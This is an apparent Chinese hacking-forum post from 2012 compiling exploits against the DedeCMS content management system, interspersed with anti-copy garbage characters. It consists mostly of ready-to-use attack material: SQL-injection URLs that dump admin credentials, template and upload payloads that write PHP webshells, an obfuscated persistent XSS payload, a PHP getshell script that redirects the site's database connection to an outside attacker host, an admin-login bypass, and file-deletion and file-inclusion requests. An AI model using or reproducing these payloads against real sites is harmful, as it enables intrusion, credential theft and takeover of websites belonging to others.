找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3087|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
5 d" O4 P  t& V6 z7 j, W2 U
Dedecms 5.6 rss注入漏洞
# N* S# H* X  P! [* @
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
1 z0 r( c) b% h' d3 C# r% F5 Z: y5 {5 A5 Z
  |* R* z# F  ]
1 J# A6 h6 v+ U$ k3 H4 p
) ?0 s! D. \; j  [$ R2 D9 M# Y

1 H- A; r& f: O. ]4 ^) n2 ]6 |, h6 k

0 M  n* O; t* y6 t' [% N
5 B3 T; E- \! m1 i7 o0 ]0 S8 [+ FDedeCms v5.6 嵌入恶意代码执行漏洞$ l) ?' r4 ]# J3 @
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}  O* J" P+ W$ I/ j, u$ {/ W) X
发表后查看或修改即可执行$ L, p. I- k* ?8 W/ Q0 C$ o
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}3 Y: ~/ ~6 O: l' V4 a' n9 f
生成x.php 密码xiao,直接生成一句话。
( g9 ], v* l+ p6 ~+ l, m# }( n$ \
( N, }. M$ Q9 p
) u0 ?- R; v; {/ k) p6 x% @/ [( `1 L; v( `; L& s

7 e3 x2 E7 O% k+ k0 Z6 P4 Z! h& E* B7 G2 r

* e; w0 w% j" ~7 {- E
6 z- h% t0 l3 m% X$ p
$ c& h$ R! Z& t1 FDede 5.6 GBK SQL注入漏洞- X2 H1 _: l/ P6 ~6 j- w9 y
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
/ j7 W1 K4 u1 p6 T9 O" p0 ~
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe5 r4 q# U6 ?. ?/ k2 f
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7. r  d8 J1 E! n; L

7 U& N' P3 P: T% [; D
. |- n* x8 C0 O5 W  [9 P/ C" ~( ^# I& o6 ]4 v8 k$ P8 U4 x8 }* }
" Z. B4 k1 s# x

2 L2 R0 G# U/ z! J2 N8 a8 m7 B& [, `' b0 q6 C5 N5 T
, y4 ?9 L! `, U6 O, y% _
" u. A4 s& ?  W; |. [
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞% G& k) y0 U7 c- s+ ~! J9 f0 n
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( m$ S8 g& E* v& r
$ N( m5 a% z) G- h# s. y4 E" m: P% _/ p7 a7 R* I& l

; x/ z& @2 \: b+ E- Z) e1 H5 G' n7 `
# \6 l) @7 T; F3 A! v0 Z, y+ B
2 b  X; P8 H: A3 `& @& j0 n
DEDECMS 全版本 gotopage变量XSS漏洞
) z. V9 F% I6 @& a1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
$ g8 s; _& U3 t- o! D
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="5 h" ]% s, ^. |

% a( I. v, b# ~4 s" N
5 K% g% e, K# k$ k5 ~7 Q2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 * n! z3 r6 r+ e4 l& T
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda0 Z1 t- ]6 F% n5 m
. h! e) N7 C" |! s: t( v- H
$ b/ u/ q& d( n9 y
http://v57.demo.dedecms.com/dede/login.php
8 C- r( ?5 x: U8 A1 l/ T' y3 v* t. [# h: i8 M9 ?# b

. b& ~' A4 ^4 x% t" P1 @color=Red]DeDeCMS(织梦)变量覆盖getshell, d8 d1 T" h( }' |: D
#!usr/bin/php -w
* K. V+ }" V/ s; w3 e# g7 C; M, t<?php- l5 V5 ?7 G, s" Z+ l! D1 K
error_reporting(E_ERROR);* ^3 ^" P: }; v& k
set_time_limit(0);& y) V3 L4 K3 f  ~+ g; w
print_r('& i" D5 W1 S5 z) l0 c
DEDEcms Variable Coverage* G5 }' x) h' w" F* S* y0 U/ [
Exploit Author:
www.heixiaozi.comwww.webvul.com
; A- ~& f. ]7 I, c" S8 c3 H);
/ {3 x$ }: V$ n5 a7 P+ j0 Lecho "\r\n";1 i2 L2 Y: \, _3 e0 h+ I2 U' D' F
if($argv[2]==null){
  H: J, U% N# h+ nprint_r('' H) g+ f7 t$ B, B0 @% s
+---------------------------------------------------------------------------+
0 o* u) @$ I& B0 J' L# D) }Usage: php '.$argv[0].' url aid path- P/ {' h. ?) B# \
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/( m) p1 K9 e& H& \' t% g
Example:
1 |) \# s/ g  z' Jphp '.$argv[0].'
www.site.com 1 old
4 @6 K: L; ?0 j. |8 f+---------------------------------------------------------------------------+
/ s- B* B! T/ M');$ f7 b; @3 P$ V/ ^! S4 W  k
exit;
8 Y; {, _& }) N- u3 K8 `}1 K4 l/ e2 ]1 G# x
$url=$argv[1];' N: V- ^( R  u6 t6 k
$aid=$argv[2];
( }7 w# Y& W/ @$path=$argv[3];7 O$ I4 Q# [7 N; U( k
$exp=Getshell($url,$aid,$path);
1 D! K+ F9 P* y/ zif (strpos($exp,"OK")>12){( u/ {( H. m$ {0 b
echo "
  }$ h4 W% o1 hExploit Success \n";- r5 T: J$ g, K) \9 |  `; p, ~
if($aid==1)echo "
, `) t$ f4 J0 t$ m4 M. ZShell:".$url."/$path/data/cache/fuck.php\n" ;
5 Z. w/ B& V. C; Y% ~
1 {" k1 Q4 t: ]9 v- j' |4 K# J( t, d& B, S
if($aid==2)echo "! I7 M# r) n9 J# B
Shell:".$url."/$path/fuck.php\n" ;
7 i. Q2 c' O2 V9 A. c# c% S- H5 j2 L; l- U
- {" X9 v$ ^4 K7 D' N
if($aid==3)echo "
! U' I: s/ q& MShell:".$url."/$path/plus/fuck.php\n";
" Q4 Y+ K8 E: `1 h. b
; ^& [0 T' p' \# K! s3 T5 }( \! h" b! k2 v
}else{
" q; R: o7 Z- k- kecho "
: V# \: ?( g6 A; \, DExploit Failed \n";6 I  j1 T. l. G5 H3 `' z6 i
}& I4 g! N' }( @* j
function Getshell($url,$aid,$path){7 M+ l* E. F  w; Q
$id=$aid;
9 P5 k5 A; Q/ T$ S' W( D" Y$host=$url;! j  w4 h% X9 c$ h2 d
$port="80";: k0 N+ ^/ M/ b5 Z8 H  s
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";2 n& R* ?8 u* d8 u
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";% k5 D' P1 o% ?0 v
$data .= "Host: ".$host."\r\n";
( u; V1 @' {2 v$ K5 }/ o$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";! Z( }1 `! f& i: b* {* |8 U- M4 n, \6 B
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
9 n" t; x! i; V/ C$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";& G$ V7 [- {6 W# Q
//$data .= "Accept-Encoding: gzip,deflate\r\n";# J8 s) |7 n0 A5 w
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
* E6 F/ ^% F3 ^7 H  v$data .= "Connection: keep-alive\r\n";6 L' T- {( m$ \3 x4 R4 x, C6 e# D
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";0 h6 U6 E. [! j4 T- O2 A; W; z
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";# H. q4 L6 E' _* W. {8 O
$data .= $content."\r\n";
# S: t# R6 I7 a) G/ h4 a$ock=fsockopen($host,$port);
# ?; F7 r2 F9 F& Jif (!$ock) {( e- E' q( B3 J; O" ~: _$ {
echo "; _4 d9 a2 X' y% e1 c8 }
No response from ".$host."\n";
7 k2 Q8 [/ N3 S. y. t9 Y6 a: [& k}
* L  X0 r* Q$ `fwrite($ock,$data);
: E* x- d# Z' Z7 ?while (!feof($ock)) {8 R0 k5 r0 M7 ?1 E# q7 M5 w
$exp=fgets($ock, 1024);
% G' g+ E7 U, b- }' H/ {return $exp;  U; E4 x8 k" R( e0 g
}, h# ]  D6 P' Z& l: Q
}
3 h6 g8 ~4 R& D  n- r( P8 v1 x/ {) O2 J- f6 m3 _
- v% C- O8 H7 k' `* \
?>9 V8 n9 z- y% i$ }0 y

: j; O0 M! L/ ~5 h1 ]( z
) k) V4 A$ w4 T) J4 \3 C/ V1 s( b: ]9 P& \

, p! Y4 E4 R$ [! z: l% t" _: b5 i4 ^' J
" J: {. `/ N; d, U  T# i/ C
- Y# _; w/ V& l8 {# X* M
. [  P2 o( f7 E) v2 N' _$ |1 V

: z3 T9 V+ U- `) F- {% [/ y# {% g! d9 K" t4 C5 w0 L
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
% x) u0 ?, L' ?3 v4 o- z
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root5 M7 D0 l& ^' o4 {4 q7 L

7 z- v' M; K) b  v8 t1 j; L! l* Y7 n! P" R' ~, w
把上面validate=dcug改为当前的验证码,即可直接进入网站后台/ h$ g" U  o, J( O8 R
, }* u$ m" }0 T& X: B

) c4 w" g3 M# g  Q此漏洞的前提是必须得到后台路径才能实现% h' g! G2 t: a$ K" M4 Q3 G  m% G
' [9 I7 w1 J# B; P, \9 [7 ^1 I$ r8 g, n

! y' ?( d/ o) n+ h# R$ m6 B" }
9 |5 I$ @  w$ F# E' T( ?; ^, h
1 w- K0 V. D  E0 x$ I& A7 o, c; }2 F4 r, o$ b2 b9 ~. A. n0 S
8 y/ i; b9 h8 X: k0 C4 _7 ~

- J7 `: r$ \9 D( |" Q3 z
# i* g! Z6 R) O
. `! d+ }0 m4 D$ G" K4 a. S6 d/ n6 d! ^6 y3 e
Dedecms织梦 标签远程文件写入漏洞5 b$ p" a+ s5 X4 K, c+ }
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
8 g6 I, \6 {5 t( v( z% g; X% u
. C/ B8 K5 t# R6 s7 F
$ l/ G& |' j* s; ~再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 + A9 |% X! ~2 H8 R9 B
<form action="" method="post" name="QuickSearch" id="QuickSearch">
( S5 u+ ]3 [1 N+ L3 ~1 {<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
3 w8 T: l. Q+ ?<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
% S( Y8 z+ O' k1 m  }6 x( `$ @<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />9 R% g$ Q5 s! Y1 x& L, A0 Q4 U7 r
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />4 H: M" E# Y" W+ V" B7 m$ s2 Z5 v( M/ h
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />( P8 e% x( }( I7 o4 \& P
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />" J* y  G8 F/ R7 f  Y
<input type="text" value="true" name="nocache" style="width:400">
9 l( n: {# ^' H+ B<input type="submit" value="提交" name="QuickSearchBtn"><br />
1 O0 Z, s/ h- c: q, ^</form>
5 e+ \9 R+ W6 |8 E<script>
$ t% n+ X2 @7 gfunction addaction()
- b$ _+ m7 k3 l/ S& K{, s0 q) Q" r# @! f* H8 f
document.QuickSearch.action=document.QuickSearch.doaction.value;( i* R) I7 F: Q! a
}
& @; D% |) u( v3 z* x9 D</script>% V. @5 K9 R5 w' U8 v

! I( ~3 t$ a1 W! P2 q$ c2 P! g" `0 D0 V5 F" J" C7 e/ r( T
) P) f6 O4 v# E: B  ~' k

! f8 }! R: ~6 u' Z9 x' d+ }% x0 X; ?! ~/ n% G+ V% F& a
! w8 _: l9 ?/ K+ ~- z9 B5 [

0 |- q# Q2 x0 {) r. r1 T; F
' T. I7 W% U- L2 }8 X3 ^! T: n3 }( H, p% U: z

; y4 J9 w2 y; A+ h( \* qDedeCms v5.6 嵌入恶意代码执行漏洞8 G/ N' N9 S' M
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行  X' i* v; Z. h6 L; x" {! P. n
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
- n) e& f5 r7 I: I3 \" i; u+ [生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
- g* [. |# f) c! L7 I7 sDedecms <= V5.6 Final模板执行漏洞0 }. ]/ v0 u( c" e( y
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
% k6 r/ X- t+ F  iuploads/userup/2/12OMX04-15A.jpg" \+ P; k# E; N) O# P+ [8 [

/ C% O5 S4 E5 C& H4 `+ L( R. i1 Z
模板内容是(如果限制图片格式,加gif89a):" B2 a3 e  \" M' l+ L9 w  D
{dede:name runphp='yes'}6 R3 a2 ]& I, Y4 z
$fp = @fopen("1.php", 'a');5 y! P$ e; `2 D2 D  L! J) w
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
) N+ @+ |3 L. d( W- }! {6 L) J@fclose($fp);# T) c4 B7 Z+ R7 ~! Q
{/dede:name}- o2 Z; X3 {! c: y3 H
2 修改刚刚发表的文章,查看源文件,构造一个表单:
! J6 w% }. X# S) m& d' ]+ i5 L<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
( l8 m, \1 G! Y) S8 a1 g<input type="hidden" name="dopost" value="save" />. l6 P' C" @& X9 b- B7 N" ]
<input type="hidden" name="aid" value="2" />) P, T0 T. D2 i4 s! `
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
  J5 @8 N+ Y: G4 x$ V6 K+ b! P<input type="hidden" name="channelid" value="1" />
7 S$ m- d) C$ G; U! ~1 _<input type="hidden" name="oldlitpic" value="" />
# A; W! e' I& x- ^! k<input type="hidden" name="sortrank" value="1275972263" />* X) O3 i" ?- S; Y

) t" l  ^) }2 {% _
' u* x9 l0 o# H: U( M9 k<div id="mainCp">0 |  l5 O; I: _$ Z5 F
<h3 class="meTitle"><strong>修改文章</strong></h3>+ n- t( A4 J9 b5 a, {7 W  [: _

; }6 c! Z% Q1 U% L9 w, |
* J2 Y9 }' g% G' o<div class="postForm">
+ n& O" Q3 N3 r5 j& u<label>标题:</label>5 d5 b* H8 O* P: L* Y3 k3 E5 T
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
, M/ ~( p$ A: i- I/ E8 F) B/ A0 R4 J4 P' \# G# J1 Y

- i3 V/ |2 J5 }0 ^' S$ a<label>标签TAG:</label>
: U. S7 W) g* N<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)  I) H' G6 `% k; H3 {& i' {# M

. e  `% a8 y* X6 r) E! M; H) Y/ r. `# [
<label>作者:</label>3 U, p4 i5 c: g$ n
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>4 w9 ^# l$ Y4 b) `
) q- o# E# c0 M3 w1 `

/ m. n+ B4 t& t# \( Y- I. U<label>隶属栏目:</label>7 Y1 V# ^* a# Z! w
<select name='typeid' size='1'>- ^0 \, m6 [/ _3 L$ a
<option value='1' class='option3' selected=''>测试栏目</option>5 u5 z8 H2 u# f& b' ]
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
9 E! x* B! t/ k. U0 j  u7 E* P6 Q
& Z; G6 r8 z) _2 f& c/ t2 w! y- x5 K9 Z0 r  C
<label>我的分类:</label>/ O. Y1 X! ], r
<select name='mtypesid' size='1'>
4 Y2 O. ~9 ?6 y( c  F. \3 o0 q3 d<option value='0' selected>请选择分类...</option>1 n/ u# Z& ]9 g
<option value='1' class='option3' selected>hahahha</option>0 f6 @. I& h# E* W
</select>3 O& {" T- r3 L3 G
$ u+ j! @- X/ S3 \. U
3 B0 x- [- W+ u/ K
<label>信息摘要:</label>8 D+ B$ o2 M8 P* }7 G
<textarea name="description" id="description">1111111</textarea>0 X! U$ d5 S6 a
(内容的简要说明)
. s" r0 Z5 }7 q: w* x  d2 a2 l/ E+ Y8 p- S# S
0 Q. i  ]3 B' |* |. K/ F
<label>缩略图:</label>: [/ I$ ~+ i1 G/ k! _
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>  G+ A$ V* c8 i6 p0 c

3 w6 D5 G( r& l5 Y4 F! u: v' N# D% P( C" d1 a6 G, W+ y- X- E7 y; P
<input type='text' name='templet'
! M- V* k( e$ W  a- fvalue="../ uploads/userup/2/12OMX04-15A.jpg">
& W' E$ z1 _: Y% A  X  I; k( [8 ^, a7 y<input type='text' name='dede_addonfields'
& w. d. Y/ @% r4 h4 R. ?value="templet,htmltext;">(这里构造)
& ]1 P% ]: B. `" a</div>; k' m4 R) {* j0 e, @; ~0 d
2 o0 o4 |7 C) c2 C5 n+ Y
5 m: B6 n; h$ N+ [: Z# `+ R
<!-- 表单操作区域 -->
# t: N8 K% x% y8 `<h3 class="meTitle">详细内容</h3>
1 w  [. @( m0 x' h: _. R8 y" E, r4 N/ G! e" G! b6 U# _. |# H
4 k$ S; J9 d+ V' I" d
<div class="contentShow postForm">
4 \6 }4 b7 W6 ]' J' U1 |<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>, O. c. Q2 o( T( I- r0 f3 ^: {9 r3 g

$ `1 ?( J7 m3 @# T) D' M6 }, j3 H; Q/ T: N( u; c( o/ y: S
<label>验证码:</label>+ ?4 M+ |" C  Q# n# E4 m; v0 _
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />" V$ ?/ H+ Y1 S
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" /># L' X. [# O0 }* M0 Q

) _5 `" a% Z$ v, R; w0 B3 v- W; I/ g' e! h/ A) l! T# u7 S" K, C/ {. X: Y
<button class="button2" type="submit">提交</button>
0 p- z2 N! }' [! L; a<button class="button2 ml10" type="reset">重置</button>
/ w9 T0 I: c; r* Z: F</div>
1 W2 i8 K; n9 R3 P: c, q! V+ @
+ c+ a. C$ p& A: @
; E, H% w: T# F2 _6 S7 D9 D</div>  D' J. T; L$ X+ `

' M" ^6 @# f% b, h9 j$ G
- E. _" a( f8 f2 z" ]. f% {1 t</form>: n) k) T! `% i, e. j9 k! A

' t' x: E% o- [9 C/ `3 L2 K& k* G0 ~
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
0 p6 k5 `; j: y. B2 l6 U假设刚刚修改的文章的aid为2,则我们只需要访问:
& _+ @, \  o& }9 z) _# f& g& d
http://127.0.0.1/dede/plus/view.php?aid=2
& K" D+ j3 x  G8 q2 O" w即可以在plus目录下生成webshell:1.php
8 I6 X3 ]" T9 p: ^
; l2 e+ Q7 n9 ~- z! l& j8 x
, b. E# H( [2 {6 q: u
, F1 |; u, W- P5 H
8 a+ J4 w8 T* @9 N: T: H4 u2 P/ T0 q/ z$ l4 K6 s# I; t# G
1 w- |; P4 X8 s5 E, n6 c% k

9 {+ w& K7 [2 @- e; G4 V( q. D5 k8 B" n, `# l- t( u
& L( Q8 s% C" Y. F

- b. T( O8 H1 f, @+ u
# K7 q" k, I2 I& D) D2 w  Z6 m5 z9 v3 T3 [
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
2 s0 e# Q( U1 V# J* v5 R' ZGif89a{dede:field name='toby57' runphp='yes'}+ A& o& Q" D- V0 r9 C: ?
phpinfo();
2 ^, y  q0 T0 W: ]0 z4 x$ e{/dede:field}. o4 \2 p0 B3 N" q: n8 V. ]
保存为1.gif
/ i: u3 K3 J, J' f+ a; n- T<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
0 q* D6 @% Z; }3 }" I- e<input type="hidden" name="aid" value="7" /> ! `) r: j; W) l
<input type="hidden" name="mediatype" value="1" /> - v! M; l3 [( b' i/ Y
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> " t% ^* y$ l4 g; t
<input type="hidden" name="dopost" value="save" />
; B( g( W# G! n- }<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
: r: A5 P7 W! V; s4 F9 e6 K' e9 e<input name="addonfile" type="file" id="addonfile"/> + Z, C+ d) I1 F: H: Q$ @
<button class="button2" type="submit" >更改</button>
* S1 M1 [6 t$ }0 U  j# l</form> ' h% M% A; c( X+ N/ `  G0 F

& J5 w. `+ V$ Z4 x
6 H) e+ t' H( ~2 s( M构造如上表单,上传后图片保存为/uploads/userup/3/1.gif3 W" u, b8 J/ Q* M  }
发表文章,然后构造修改表单如下:
0 Y3 }+ m- G- h" K" `: A7 r. r: G/ G( ?  u" v& u9 L' l& ~* q
+ l! l5 K5 o& E; l' t( `
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
2 M6 d  p3 p( G. E1 s<input type="hidden" name="dopost" value="save" />   F+ S' N" Z+ [' Q3 N
<input type="hidden" name="aid" value="2" /> 5 B( R# k7 k+ H
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> , F; M# g; W- {# a5 y
<input type="hidden" name="channelid" value="1" /> # p8 e/ Y4 U# i$ q5 |2 s# C4 g
<input type="hidden" name="oldlitpic" value="" />
8 U" Z% C% C! B2 A/ J& l1 r' p<input type="hidden" name="sortrank" value="1282049150" /> 5 s% |! G, H3 w" q
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
; ?4 P" T* f  H" P% H5 i. V<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
. Z& u9 c& B7 S# P. U; ?<select name='typeid' size='1'> * N" S% r* E- J7 v" L; ^4 W- N/ F8 X
<option value='1' class='option3' selected=''>Test</option>
0 o( D* T, n* b7 o. K; b<select name='mtypesid' size='1'> 5 u2 E$ n$ ?' c$ F/ ^
<option value='0' selected>请选择分类...</option>
+ Y& t7 u% ~: g! P7 m<option value='1' class='option3' selected>aa</option></select> & g  B; ?6 g# y$ W8 m8 J
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
8 F" w$ ~( F. Q<input type='hidden' name='dede_addonfields' value="templet">
8 z' _" G6 P0 F  u8 D<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
3 X; R% `# |# y1 s1 d<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ; l. r+ G0 L% v4 g# G6 x
<button class="button2" type="submit">提交</button>
# t4 p# T& \5 O* o, S# G+ ?</form>
0 a5 M' A+ B! u% {# b
* S# J5 t5 O# a0 L6 p) E
% a5 j6 l* k  j: B, Y$ r3 R. s
# r% z( T) W/ n& \9 [# \. W; J5 ^6 E5 B% [

' }: m( v! l! s0 y  O: I
, N+ ]  q4 ~! d) q
* {. }3 ~/ c2 u" ?! ?4 W8 [7 P4 k' h8 e% G; R" c: {
% n. e( W' x) N, y# y
4 u  J6 c, I3 A2 S
3 x* e! y1 l  ^+ g5 ]6 m* p

* ?/ s' @8 t- V8 D织梦(Dedecms)V5.6 远程文件删除漏洞* }2 r6 |' p3 ?6 Q: P
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif; S# b: l, F) Y8 r& }
! \6 m1 c* Q0 d

2 s5 O% d, Y3 b! e. @* c& t- ~& ?8 ^! ?

4 J, N! f3 z, A
2 f5 c! g  h& h  ~) S5 j$ P& t/ x8 }, F: }0 K! l
" n( |* V* i+ L6 Y' k2 M

# |3 _/ N( p) x  Z: g1 o- f
* ?, H! w# Q7 S' h3 N# W& o2 C% X& |( I% H
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
6 d$ B7 `9 V# N4 j. C* U" P
http://www.test.com/plus/carbuya ... urn&code=../../: N) D" O' s& \* }& [) m

, C7 z0 x* ]% f8 F+ P8 ?2 K6 \8 O; F/ W* S, M

& X3 ^2 y* P; ?+ L+ c  M  x: L
) w: L; ]3 ~5 s& _. \
- [9 @) g- N1 b( u
5 I1 I+ q4 g% X& a# s1 w  j& }7 b  ~1 ?. c. B& X. z4 [( N; g

( n- y9 `0 Z+ X- {# p& y- @5 M2 [) E8 V3 P* M9 u) Q
( M3 f5 x. X& n: p
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ' l/ w5 ?% }; ^7 z/ q; n5 V
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 `6 q- I$ Q  J' G8 t3 h% N! B4 ?密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
- Q1 T8 `) t: \# U" n" J1 z8 w5 z6 H) Z
0 q+ f8 l2 b; O

4 n( C: n) Q1 s( \8 H$ |% Z! P% o' j3 u# V) X8 _8 \& m1 A

4 Z9 U" ?& H; ^, m; D4 [  ~5 L$ J- b  T0 E1 ?. o$ }4 \

# Z+ D- b, C* T1 w& l# T" q' D6 }2 ~+ `, X9 M. B6 z( L; Z! \

0 j2 @" \# }8 d9 F/ Y8 u: l5 r9 L
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
0 a( k4 O" \/ ^# ]7 Dhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='7 N3 {0 ]* c4 v7 c; ^" A* L

0 F% E$ \. }6 G) v4 R# ]# N' n5 ~8 A! [4 }* x" L
& {# _( n( Q: l

" O. U$ \* N& _) i& k2 B) \- d( d$ Q' V$ C& U. s- b

5 G* l0 b) M: f/ F+ ~9 s, i" @: u4 I( U+ q- ^3 k. T; ~

